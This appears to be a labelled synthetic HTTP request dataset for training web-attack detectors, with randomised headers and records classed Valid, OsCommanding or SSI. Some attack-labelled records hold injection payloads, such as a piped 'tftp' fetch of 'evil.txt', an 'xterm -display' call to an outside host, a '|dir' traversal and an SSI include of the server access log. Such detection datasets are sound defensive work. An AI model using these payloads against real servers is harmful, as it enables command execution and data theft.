GET /a5U5sd_PNrNY0dq3IH9/nG56bmS/slo7ayecT8aqQuduwn/am0aAetacnYesphe8tu4/gX9fudl6r1gN.libh/m0731KdI4.@/8addbaooothnhrH.nsf?2sejrcocbap=X3&oian0=bOPWH5.usrRS&ordri=h7r&zEis3tTofine=iIl%40hXh0&7hJ-execiK._X=o%7C+s%24&tTactreutcafNb=%3EaRwaS-np&tzHaTosI2s=5183&teatisad4iah6=hc6cexrooinrsoiEi HTTP/1.0
Host: 170.8.77.1:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, deflate
Accept-Language: Sern8-s, edotlt-lb2isb;q=0.6
Cache-Control: no-cache
Client-ip: 234.60.18.141
Cookie: iyn1tnbsnWoowhe=nez--9J@5nL;rendTdptetXcgv=2489;XXnM=nEvNVnMVnjmm;FaDFDWV3-=o-P
Cookie2: $Version="4"
Date: Mon, 21 Aug 06 12:48:36 GMT
ETag: "yoHsLODn4AP.W-iZy"
Expect: 100-continue
From: dnCSe5st@sqeawRtsa.cz
If-Modified-Since: Wed, 19 Oct 05 16:42:58 UTC
If-Unmodified-Since: Wed, 13 Oct 04 07:57:36 CET
If-Match: *
If-None-Match: "335-YJH6uo9Wcr4iYnK"
If-Range: *
Max-Forwards: 346
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM dGllYXN0VWUxYnJyc25rOG9ldWFoaWdTdmxtaXJya3V0ZGk=
Authorization: NTLM aXk0d3plbmUwbHJlSWVjb25hbGtIZGFua3Q1cGFzdTZ0eHQ=
Range: 0-687709
Referer: http://rnsonaa.net/onAcd/ia7lst/oaom/lmvhr/tdyeen75.mpeg
TE: deflate,deflate;q=0.2,trailers
Trailer: Referer
User-Agent: Mozilla/6.5 (compatible; MSIE 4.4; Solaris; ta6ss; taeb9Xdjaf)
UA-CPU: 68000
UA-Disp: 9797,8941,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 073x1675
Via: HTTP/4.4 www.ohltoit.png, FTP/9.1 63.98.43.171, HTTP/3.8 235.229.126.57:80201
Transfer-Encoding: identity
Upgrade: deqrsi/3.0
Warning: 895 240.109.248.223 "xes3Sgad2essEorscnn" "Tue, 16 Mar 04 21:51:36 GMT"
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20840
Start - Id: 12870
class: Valid
GET /lmIMofme/Vaatsd/z.89T4rcp/l4h4mze9aeborh/ule/rwngcvJ3j.c5/wYFVokbjwO73TfAdBhM/c.2-/g8lE.sh?tecm3sTgsros=hEt5&vCie4t=tn&iqrjlf=%2Bc&hdhsrr=binatabe%3Et0ad%5C&feOaheaTdlmn9h=o2&agflpun=%25u&angtrbb68=4176922&L36o4=duosleaul&PbDtelnetgS0gSK=3bT+s&shittlnErytny=333&odrlranClu=c2srynnm&a2nlmjtlsrrhs=692&mryaEtHeuttacwp=tXJidUfMr4MS&R-lcopyNeKo0dt=ioehiRo&eeadtoNle=ot HTTP/1.1
Host: 53.67.204.147
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.6, gzip;q=0.6
Accept-Language: l2-yh6O
Cache-Control: min-fresh=80802
Client-ip: 143.188.224.212
Cookie: LYemefSlry=hrAaLfa;demrlnh=rthSS9tnnpNbsu;yr=3991527;dtpoorteer0nTaa=idrCtns;emd=rEh
Cookie2: $Version="52"
Date: Wed, 23 Jul 08 01:39:09 CET
ETag: "5_YVBPvb_8_iXA@up"
Expect: 100-continue
From: dt56@hx2gENt.it
If-Modified-Since: Tue, 14 Aug 07 17:47:58 CET
If-Unmodified-Since: Wed, 31 Oct 07 03:19:28 GMT
If-Match: "dmKGKdP8Ee8cj5U"
If-None-Match: "Ahk-1QRZ@x34Rxl"
If-Range: Tue, 04 Mar 08 11:16:13 CET
Max-Forwards: 112
MIME-Version: 9.5
Pragma: ycane6ic=fub4fjyn
Proxy-Authorization: NTLM bmZlY2dlYWVldG9vZXR0SGxob2VPaHRWZXN1YTVlNDl0ZWh1MXJzbWlud2Fy
Authorization: NTLM ZW5hZVB1YWVjY3NpZHBFZG40UFNudHNldDhUbjF5bmhld29zaA==
Range: 35161-,-2,70941-
Referer: /eAew/7zbwbis/9iewt0s.mdb
TE: chunked;q=0.2,chunked
Trailer: Referer
User-Agent: Mozilla/3.0 (Windows; U; WinNT 7.7; oi-oe; rv:3.2.7) Gecko/26106285
UA-CPU: StrongARM
UA-Disp: 662,803,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6070x3417
Via: nwsnat/4.5 43.243.142.141, 1.5 129.255.35.253, HTTP/0.0 251.159.172.235
Transfer-Encoding: gzip
Upgrade: nni/8.4
Warning: 459 3.46.7.71 "aatwtsjt" "Thu, 04 Mar 10 22:36:49 UTC"
X-Forwarded-For: 91.199.65.166
X-Serial-Number: 4907746729509688
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12870
Start - Id: 16631
class: Valid
GET /Edek.nsf? HTTP/1.0
Host: 203.236.231.33
Connection: Mendemte
Accept: text/html;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 237.252.46.150
Cookie: tSttsn=1;aomoo=nctw96T6ts;EiduAhnewf3e=nrocwdita;ai=and;mhmete=egroup byi0V8a)xot8t
Cookie2: $Version="330"
Date: Wed, 19 Apr 06 12:49:16 CET
ETag: "_OT7_P8378lUD59d"
Expect: 100-continue
From: NuRe@6eea.cz
If-Modified-Since: Thu, 23 Apr 09 21:24:11 UTC
If-Unmodified-Since: Sun, 09 Jul 06 06:52:13 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Feb 08 01:09:17 UTC
Max-Forwards: 3461
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: ttdia rghriOx=i1agttb
Authorization: mrmz5j ttjih=om0t4e
Range: 38173-
Referer: http://www.pboet5rh.cz/mastsldy/itwehng/Oef2/mnlu.jsp
TE: deflate;q=0.2,trailers
Trailer: From
User-Agent: r6RNcb http://www.Ogorn5.cz
UA-CPU: MIPS
UA-Disp: 8189,4167,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 702x893
Via: ebr/2.5 54.16.4.27, HTTP/1.7 92.109.116.34, 8.5 81.183.4.91
Transfer-Encoding: compress
Upgrade: lte/0.8, ascmyo/0.4
Warning: 144 84.222.150.233 "udseldAuvnntiswe" "Tue, 18 Apr 06 02:19:07 UTC"
X-Forwarded-For: 113.124.88.179
X-Serial-Number: 6104122445139965688
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16631
Start - Id: 44627
class: OsCommanding
PUT /iKYk0KSW/uy4iZruPz/feefrtirfrycw9/aa7R/klikexservicesIOYinclude/Y9hy/i5lwmQ2.cY..asmx? HTTP/1.1
Content-Length: 303
Content-Language: rRloeo,fet
Content-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 10 May 05 08:34:30 GMT
Host: www.skee.fr
Connection: keep-alive
Accept: application/x-tar;q=0.1
Accept-Encoding: 
Accept-Language: en-rSslRrti;q=0.2
Cache-Control: max-age=3679
Client-ip: 213.120.197.202
Date: Mon, 07 Jun 04 16:14:13 UTC
If-Unmodified-Since: Sat, 20 Nov 04 19:40:28 UTC
If-None-Match: "8EDk8IqQlhb1vcJg.Jk4"
If-Range: "vUeKlIgWRSKQbbcjlhTX"
Referer: http://renieT8u.ch/evthbe.ace
TE: chunked,gzip
User-Agent: 152.255.70.54|  tftp 192.168.10.33 evil.txt
UA-CPU: MIPS
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

o1ibr=ax&idplbuPeeFsas=mBvexmnnie&eezo=trh:deleteza[d&UiWiaabizeeh=2ddn7t9tt7s1m3cA&D9i8=14269&esvoerduTvnaua1=htpass&dnhaAsrtie=)tn &NhtaccesAnW4PAf=-hiwp-0aesa&Tralii=nDcLS&sctlH=9513&audkl=qSrcpic&ksnt8eka= +eioDr|vtsce ceig&.@objectPDshutdownx=72&dhhacradretedss=t7ofhaRetrcpimgmrv&aan=hfi

End - Id: 44627
Start - Id: 31273
class: Valid
GET /ovgtc4I/nbaNLo8ApCXSeG/@U3DES/pie3aosb5/eW1tKiZPx.gif?jjsnode0position=3258607&ifk9Eti=3347720&nnetlae=aqtLvQl7Wqw&dw4Anu9h=53 HTTP/1.0
Host: 39.229.230.161
Connection: keep-alive
Accept: */*
Accept-Charset: cp-950, koi8-r;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 200.93.24.149
Cookie: cs35etz=6;pldcC=R0
Cookie2: $Version="0"
Date: Mon, 01 Nov 04 08:39:21 GMT
ETag: W/"6QGkVgbPM@bx-ExsL"
Expect: qddeh=sdiabmt;loHserrr
From: nio77o3@cuat.be
If-Modified-Since: Mon, 20 Dec 04 06:37:44 CET
If-Unmodified-Since: Sun, 17 Apr 05 07:41:36 GMT
If-Match: *
If-None-Match: "zaY0Tpaf0g7pSmM"
If-Range: Sun, 18 Jul 04 03:17:46 GMT
Max-Forwards: 173
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: Basic c2F5aXNpdHM6ZTFXbg==
Range: 019-,893-4434
Referer: http://www.Shou.com/fl7ifos.msf
TE: gzip,gzip;q=0.3
Trailer: TE
User-Agent: ldrceoe (m6s2Sp; fB2slYU; yS2fzoCd)
UA-CPU: 68000
UA-Disp: 5325,2370,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3795x126
Via: Tmhl/9.7 98.204.196.120
Transfer-Encoding: compress
Upgrade: lwn/6.9
Warning: 691 www.OGbt0T.css "udswuftuhm" 
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 173088240
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31273
Start - Id: 27525
class: Valid
GET /hhtNbho0ltqodoeaO/t8yathtd7tp7sn3e6hOA/1lheetTmlGetriasehed/so_-vLFqz/obVuP-/7lgqEGGhk-Aqdr3.oUj/eBcMNRXwjK/hZOrpWZzRTbpjp/gIlt3na5/iH.O4nO7-v_4YF1atSJU/f6R@RTeNJ4TxTo9D3CZt/oub7lt.mdb?QlibLKe-m=4921055242&xTAnTllbuirilu=ilaiwh3n9gweE&hsr1cy=29641&TGN@35k0R7DF=m3326Ygje&o7atebtetrre=and&wa6dte4cnzr=o1MV.xQXLo&kRo6EOGtcR=4602&nyrysweC=fOor2sd&hGeafhp=tmjZHAYTb6H%40&yvnpqiErinb4=u+%3DUautoexec&ekRmO=eoeceh8eeuoi&8Ayfdtm=835912 HTTP/1.0
Host: www.4tdqottto1.it
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: vssouTe-er, aAeser-4e, EOev-odannhn;q=0.1, tIopjs-rlr9;q=0.7
Cache-Control: max-age=0
Client-ip: 34.117.164.116
Cookie: sdzIzm8uIkusCR=18
Cookie2: $Version="154"
Date: Sat, 07 May 05 22:18:04 CET
ETag: "jnby2ZQMQJ8yv9zGd"
Expect: me45h5b
From: jdne@cltrleiio.gov
If-Modified-Since: Sat, 11 Sep 04 09:14:31 GMT
If-Unmodified-Since: Thu, 18 Dec 08 22:43:04 UTC
If-Match: "QA9QWdP8-ZYqWVoK"
If-None-Match: "57Xcky93z21hgukSqr9"
If-Range: Fri, 30 Jun 06 15:35:07 GMT
Max-Forwards: 4835
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic bmVyY2x0OnBhSTl3Yw==
Range: 895579-,54531-,8-
Referer: http://www.egmtvrte.cz/ytDFesrr/TtLcqsa/reiyiwge/yooe/nisn9eea.jsp
TE: chunked;q=0.0,gzip,chunked
Trailer: Max-Forwards
User-Agent: 1ri1r4 (tOi50d; nRu8C4S)
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0727x861
Via: HTTP/6.4 148.126.225.134
Transfer-Encoding: identity
Upgrade: Npnao/5.5, 7inei/1.4, 1fe/9.6
Warning: 561 www.Nlensr.png "s0qusp6lni" 
X-Forwarded-For: 224.28.160.220
X-Serial-Number: 427762626542035
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27525
Start - Id: 43430
class: OsCommanding
GET /sp4I/ltaEn0tczzRhkcne/plnirnniN39/iT./eiS7xpkkmUD4oc8JYI1T.mdb?V8Sec=tfh.l&nl=eawNtohiomeehrq&u5I0naIzar=%250A+xterm+++-display++www.eltrll.com%3A0.0++++&iehspeur=2404252&jtLlokln=sHatnwhoGlw&prfeaolhG=3&5hJYSgtrwhere.=347&weneywao=s+hEn&mrrdd=hTVUMjMEEiZ&qtGYW3.B=5227&zPUu=i%3Fm%2B%2FTT9c&nratsolyyeaLe=571&II=nR1 HTTP/1.1
Host: www.btlTSn8ten.be
Connection: close
Accept: text/xml, text/*
Accept-Charset: windows-1255;q=0.4, cp-932;q=0.3, isiri-3342, windows-874;q=0.0, x-mac-turkish
Accept-Encoding: 
Accept-Language: y6-sreR, diysR-eecn3At, 0sX6oiT-ov
Cache-Control: max-age=6510
Client-ip: 230.11.35.165
Cookie: us0t4nR5goo=12263337;soohEale9Hee=%(rc0aIolo9;o?d;zoh=wiem
Cookie2: $Version="368"
Date: Sun, 02 Aug 09 05:24:10 CET
ETag: "LXuX1YfEDWDYmg@8e"
Expect: 100-continue
From: satt@ee2io.st
If-Modified-Since: Thu, 09 Apr 09 21:33:21 UTC
If-Unmodified-Since: Mon, 18 Aug 08 05:48:37 GMT
If-Match: *
If-None-Match: "@hkRObiO4mRb77d6"
If-Range: Fri, 16 Nov 07 15:11:23 UTC
Max-Forwards: 39
MIME-Version: 7.3
Pragma: csirt4un=ace
Proxy-Authorization: NTLM dDJvZWVyaElzaXJjaDllZW9vbHdxYXR0a2tucmExbmNhaW5kYVJl
Authorization: NTLM dWgybmV4YTZrckFPQXFoY29mTm9laGhsdU50OXduZHZodFpFdFRz
Range: 5130-,89497-47998,93-50140
Referer: /93wslatk/tmeahn.aspx
TE: deflate,trailers
Trailer: If-Range
User-Agent: Mozilla/2.5 (X11; U; Open BSD i586 7.7; Te-et; rv:8.8.9) Gecko/52195169
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 319x516
Via: uwatc/0.4 www.le8sodo.html
Transfer-Encoding: identity
Upgrade: Oed/2.9
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 15.27.14.91
X-Serial-Number: 208175776515023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43430
Start - Id: 44245
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.1
Host: 3.103.187.111
Connection: close
Accept: image/gif;q=0.0, image/*, video/*
Accept-Charset: windows-1255, x-mac-greek;q=0.0, iso-8859-7
Accept-Encoding: identity;q=0.0, identity;q=0.1, identity;q=0.6, gzip;q=0.5, identity
Accept-Language: rqeoxyy-nepmr;q=0.9, utr-pfeorin, ri3sk2at-tgr;q=0.7, rn6-g5eqn, 3eMde-oav16i;q=0.0
Cache-Control: only-if-cached
Client-ip: 182.20.30.117
Cookie: Hdympite=seeHrea0tY;geCmte=fet6 oi;6SaurtedzisEcte=88862;6.gTlBufO=n6  $lntttctmp;rRF3bir3sspeane=tfttiswherec;acsias=n1Jkty
Cookie2: $Version="9"
Date: Sun, 15 Jul 07 21:49:06 UTC
ETag: "-8T0kbq_jilGiD3"
Expect: ohder2=drntNg
From: ided@udhoes.uk
If-Modified-Since: Wed, 29 Sep 04 05:42:54 GMT
If-Unmodified-Since: Tue, 15 Sep 09 04:19:57 GMT
If-Match: *
If-None-Match: "nHqelmTAXyPEbWth"
If-Range: *
Max-Forwards: 3
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic Y3U1aWE6YXQ1ZQ==
Authorization: Digest nonce
Range: 9-
Referer: /role/owbln.jsp
TE: trailers
Trailer: User-Agent
User-Agent: iAgksoa/8.4.9.9.3
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: HTTP/4.1 104.245.120.13, HTTP/2.1 245.174.241.3:8
Transfer-Encoding: 6ris; osgnkcE=urwji
Upgrade: hrl/2.7, tuad/2.6, kea/2.0, vowi/4.8
Warning: 992 www.i1e3itee.jpg "capc8tz" 
X-Forwarded-For: 242.235.213.130
X-Serial-Number: 87791101469123011682
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44245
Start - Id: 19834
class: Valid
GET /aJ6_oJ5gZO@gOGOpu.nsf?b3Hh-@jMadminPDw=rlsstwl8ouqqoatiai&UIzhnoinal7ttbE=8&hbixmuch=3051 HTTP/1.0
Host: 29.36.241.1
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: identity;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 38.40.186.231
Cookie: rtHtD63t= n;trrlaie=029518;9inru=r/div(t;edaeEti=156667380;tvxedtem=h93eckc2isttmdde;tadosntPcI=wRhyadEwindow.openg
Cookie2: $Version="666"
Date: Sat, 10 Nov 07 14:39:37 UTC
ETag: W/"xC2ERrrF1VCjBvE.b"
Expect: 100-continue
From: vHtmgsc3@Erycrasht.be
If-Modified-Since: Tue, 18 Jul 06 10:25:15 UTC
If-Unmodified-Since: Wed, 19 Dec 07 22:23:17 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 15 Jul 07 07:23:41 GMT
Max-Forwards: 76
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest username="NoExp"
Authorization: asdsca broUbot=v1Hmd
Range: 31-27672,31-,92-
Referer: http://www.ane5rm1.com/debn00/igdaom/eTAyOas/niisre.nsf
TE: chunked
Trailer: Accept-Encoding
User-Agent: okrcfo74OE http://www.se2o.biz
UA-CPU: StrongARM
UA-Disp: 563,5037,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 244x9967
Via: FTP/6.5 www.naobUi.gif:2270, HTTP/8.9 87.165.159.205, 0.1 3.235.24.109:98
Transfer-Encoding: identity
Upgrade: urt/1.5, duy66/3.8, 6ru/6.9, sii/9.2
Warning: 943 237.25.13.45 "Lnhareesflia5" 
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 09282554265324
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19834
Start - Id: 1413
class: Valid
GET /0x.oTxUjpOp3Q-F.cfm? HTTP/1.0
Host: 115.33.82.197:45724
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.9, gzip;q=0.0
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 145.43.119.173
Cookie: haIsUelrmqae=oyml8temreagroup byeIn;7UN05a4z=ie shuhtaccess;ialymetea=n+sts< ewc:2s|9n;Iengy8Pgowe5ai=6nbconnecttn;lensulos6=775357
Cookie2: $Version="432"
Date: Thu, 22 Sep 05 11:00:45 CET
ETag: "3YvwRJfRSCNjWREyB9"
Expect: u3tr77
From: pa8eeese@safsis72.st
If-Modified-Since: Tue, 13 Apr 10 09:32:01 GMT
If-Unmodified-Since: Sun, 02 Sep 07 15:41:23 CET
If-Match: "MFUXtmE41eq-Wmq86p"
If-None-Match: *
If-Range: "TXqAMJEQqGGOltKurP"
Max-Forwards: 5318
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nc=bcbCDC1D
Range: 6-15763,0058-47
Referer: /nugesq/ahibnl/zntnde4/a6amoas.wav
TE: chunked;q=0.8
Trailer: TE
User-Agent: tatgnr/3.2.2.3
UA-CPU: x86
UA-Disp: 569,557,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 238x900
Via: FTP/1.5 www.onere.html, 1.0 www.onit0msa.gif
Transfer-Encoding: gzip
Upgrade: etiga/2.7
Warning: 770 www.eTeDmS.jpeg:49 "e1Lit6sroulO1cet3" "Tue, 08 Sep 09 01:51:56 GMT"
X-Forwarded-For: 166.217.103.151
X-Serial-Number: 1347008
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1413
Start - Id: 39828
class: SSI
GET /position8wcA-7K2m-u/ojL.az-cq3/vn90aI/Neou/haosis5nnMaDhhr6ua/01nws.MFxntsu@3cC_E.dll?e3rmjollxdj=n-P&sh0els=hpb&3boj=ngLai&DK82iSd=4509176&9..W7E@h=sstyle&btusokhEsm16rwd=w%28n&at7E2=%3C%21--+++++%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+--%3E HTTP/1.1
Host: www.bchl.be:853
Connection: htHhfud
Accept: */*
Accept-Charset: x-mac-ce, x-mac-arabic, iso-8859-9
Accept-Encoding: *
Accept-Language: He-r;q=0.0, dAsu7n-o
Cache-Control: only-if-cached
Cookie: eonoiy=hlrNhpieat;o8trnfnphJ=>~[wyr 0n;2ata=?l)y3;D_1v9KwfpositionnBU=oomtulwcIupdate scuage6e;cEo9nsUce=6
Date: Sat, 15 Nov 08 09:50:06 CET
Expect: 100-continue
If-Modified-Since: Sun, 20 Sep 09 13:58:52 UTC
If-None-Match: "JzlGIhn0gT3lm0Y@l"
Max-Forwards: 8
Authorization: Basic aWg4YTpkaThuNw==
Referer: http://www.rbixe.cz/eteydr.bin
Trailer: Trailer
User-Agent: Mozilla/5.8 (compatible; Konqueror/4.4; Mac OS X; nmnEnzio; kmrd0ot)
UA-OS: Win9x
UA-Color: color16
Via: 4.1 www.aropr.css
Transfer-Encoding: identity
X-Serial-Number: 46103258544750968619
----: ----------------

null

End - Id: 39828
Start - Id: 23896
class: Valid
GET /1rEavwje/4HRtEjVNdHpgPz-TG/scriptO83@kMN695/s6kEhCH_E3KO6LQRtV9/uJ/yT/anl2mahtxs4tnmteiyN/igjdwNSZrDOwiC/l4p-eolNis/TvbscriptJNmGBA9mD.css?HqpsystemCjGjR=0960&ftowee2ear=oe5ltimgtn+leRooi&chcnFesn=00836284&ehaho5t=54&aeD8s7tp=tntjm0isa&eirire=im&dobaeqybn5edt=5481237&eb8rwimieeb=sy17DJ&eErIY4iNGdBtmT=989230918&UlbJcopyYNQz=09&9lwr=uensahecrslnO HTTP/1.1
Host: www.eniasEd.biz:13476
Connection: close
Accept: application/*;q=0.1, image/*;q=0.3, audio/*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: identity, gzip;q=0.7, gzip
Accept-Language: cntboc1-faedyro;q=0.4, t-g4;q=0.1, pnaarq-0;q=0.1, 4spElko-ittiis, lns4isre-aoLe9reb;q=0.8
Cache-Control: m0aoro='enu3'
Client-ip: 71.120.71.127
Cookie: Rgroup bymailh=145223
Cookie2: $Version="27"
Date: Mon, 30 Mar 09 15:28:36 GMT
ETag: "GuFemFcWilipwpw"
Expect: tae1ua=osfreh
From: nt7rur2b@ieUStzn.biz
If-Modified-Since: Thu, 26 Nov 09 12:28:12 GMT
If-Unmodified-Since: Fri, 29 May 09 10:25:50 GMT
If-Match: *
If-None-Match: "l0zn9LQSvaox5c2Gxp0U"
If-Range: *
Max-Forwards: 2
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic dXNoZmM6aXlhc3J3Y2E=
Authorization: yRXtri n1kWTnb=A6rpn
Range: 906058-,973-830,9-
Referer: /aieji8so/etto/llofderb/0tygsa/5waseO.swf
TE: trailers
Trailer: Via
User-Agent: Mozilla/3.3 (Machintosh; U; Mac OS X 8.3; Al-ii; rv:3.2.3) Gecko/49681331
UA-CPU: Sparc
UA-Disp: 722,7012,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7253x9892
Via: HTTP/4.4 171.165.222.240, HTTP/0.3 www.tpr1e9Te.jpeg, 5.6 246.62.174.37
Transfer-Encoding: nIe3; pd8e=ahtB1
Upgrade: lnd/8.0, hwTch/1.9, ody/0.6
Warning: 002 www.5girkg.js "MDcrsoovsn9ab8caPt" 
X-Forwarded-For: 87.73.118.107
X-Serial-Number: 32892404874
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23896
Start - Id: 1084
class: Valid
GET /z@vEqKAvoCyi5BA/e7guiTlabeBhlSnnn/cakbKnlC/xrmNtmpC/3Nr9qboot.iniWTOWgNconnect9/cavonsvtm/rde8saheapheStea0a/yuit1erxrtamhd0madf.htm?syt=eIuniontkedioa3+zt&onuowb=2%3AHi7O+pusrh2&ee0vc7actBeod=uHa%27&jtReIaRf=624425&ot=+5go%29Tlet%28%5D0cuscript&1gL9MA0=62&a0RRyt4s5r=e2mrm&hp7unhonsnnrto=enseUXEht&is=6657&udtre0=cvIp9fIp&GpErM=942247320&d62hgnaM=tyautoexec%7Ce&WLcGhttpH=satipesno HTTP/1.1
Host: 109.36.65.204:39842
Connection: 8oh9
Accept: */*;q=0.2
Accept-Charset: windows-1251, windows-874;q=0.5, x-mac-icelandic;q=0.1, us-ascii;q=0.0
Accept-Encoding: identity, compress;q=0.1, deflate;q=0.2, gzip;q=0.1
Accept-Language: tiaoisbh-plreze;q=0.7, aIexn-f8ynt
Cache-Control: max-stale
Client-ip: 222.85.115.146
Cookie: ubt=tiLP5Q;4mtsicnIrmgtit=870158;60icceofcoNo0ls=i1fv4oz.0S;arwrenorRheans=1ocbaformm;fustxr0sdissbf=oVLSSMkqVc
Cookie2: $Version="356"
Date: Sat, 01 Nov 08 16:58:44 CET
ETag: W/"24OIKzR5Cws.cTjN"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Wed, 03 Oct 07 15:38:39 GMT
If-Unmodified-Since: Wed, 10 Sep 08 10:55:07 CET
If-Match: "J@II1wChV5WgSo3UDqh"
If-None-Match: "unhfcInXIh@eYH2F"
If-Range: "KmJ@5wktBJ0pt9E3AHZ"
Max-Forwards: 4
MIME-Version: 9.9
Pragma: ze=zhe
Proxy-Authorization: 7u2C etet29se=rQ0naiEn
Authorization: Digest nonce
Range: 567851-
Referer: http://www.eseiettn.net/NAeie.php4
TE: deflate
Trailer: If-Modified-Since
User-Agent: iDKf-Dmen http://www.eFsi.st
UA-CPU: MIPS
UA-Disp: 465,0552,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8837x3320
Via: HTTP/1.9 184.100.10.164, ptt7t/8.2 www.raczt.htm
Transfer-Encoding: gzip
Upgrade: n3ex/4.8
Warning: 681 241.65.101.209 "Bne8meaetNbm1aowme3" 
X-Forwarded-For: 73.37.55.154
X-Serial-Number: 0153270
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1084
Start - Id: 11602
class: Valid
GET /e0L6vchA.j91Z3e/jJnpcpDqEAAwTpK/ohsaiwriahtatn/4R2PzmaZg.dbKv91G/uoPlepdehmxftre4nkt/eSa/jtbnkmnlnan7rzNet3n6/OrcpzR_6/everw.gif?riletghoetaram9=5722548218&Hr2UxX.6replace=de6&routgb=cr2neiimct&mk4eeifntteaoG=4951&nheSeoemd=ctaro&9aIttrg=eOcj1-e7&bgitde=eQM&ahb=%26or%3Dsa%29h2c%3Ff+cettl&hxedefii=25&aonuarw6aes=278156&5dGAreiub=n7sU3M&s7=68069&a3=EhshmnsdchpRadjln&etrdsaxsht5Tos7=ha HTTP/1.1
Host: www.ecabibi.uk
Connection: 6oea
Accept: text/html;q=0.5, text/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: 7feehs3e-l;q=0.1, ootries9-auotEt, wteil5hn-TEaGyme;q=0.9, aohgvz-eylh;q=0.8, dole-inqmtape
Cache-Control: only-if-cached
Client-ip: 53.107.242.2
Cookie: chidheuoSo2s=eesst;._R.szS9serviceslB=milTqeesia3d8rn;weneh8am=ited0TairnfreMs;scriptQn0daPZ=6835;veenhuttsh=nlig 
Cookie2: $Version="3"
Date: Sun, 14 Jan 07 12:16:49 CET
ETag: "NG7CZirueJmUZ1Rf"
Expect: ieHlenh
From: EDcpa6@fUssmevbFt.be
If-Modified-Since: Mon, 29 Sep 08 10:15:49 CET
If-Unmodified-Since: Mon, 04 Feb 08 20:31:14 CET
If-Match: *
If-None-Match: "Jtd6DouweN6OrOZ6"
If-Range: *
Max-Forwards: 391
MIME-Version: 8.5
Pragma: eecai='ga'
Proxy-Authorization: Basic aUlpOTY6bGVpbg==
Authorization: Basic ZnBucjplczJF
Range: 4539-2283,-21
Referer: /uosf/biRXmdan/btlhvin/Lfmeiwm.php4
TE: trailers,gzip,trailers
Trailer: TE
User-Agent: Snraugoo (sfTb2xAP; t5@AWDM; tWm83qj2wL; ns85KJhI; ydab.3ecQN)
UA-CPU: x86
UA-Disp: 503,414,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3585x2586
Via: HTTP/4.2 101.90.211.56:490, 9.2 215.76.228.39, uOu/6.7 www.As5cr.htm
Transfer-Encoding: deflate
Upgrade: te8ac8/1.9, wxL/4.7, hheCRo/8.9, yto/8.6
